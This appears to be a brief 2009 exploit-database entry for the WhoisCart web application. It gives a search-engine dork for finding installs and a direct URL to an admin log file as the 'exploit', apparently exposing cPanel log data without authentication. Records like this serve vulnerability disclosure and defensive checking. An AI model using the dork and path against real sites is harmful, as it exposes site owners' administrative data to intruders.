id: 10517
date: 12/30/2009
title: WHOISCART Scripting Vulnerability
author: HAQIQ20
cves: 

=================================
WHOISCART Scripting Vulnerability
=================================

# HOME : http://whoiscart.net #
 
# #
 
# Dork : "inurl:whoiscart/admin/hostinginterfaces/" #
 
# #
 
#############################################################################
 
# #
 
# Exploit : #
 
# #
 
# http://server/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm #



#  0day.today [2023-03-23]  #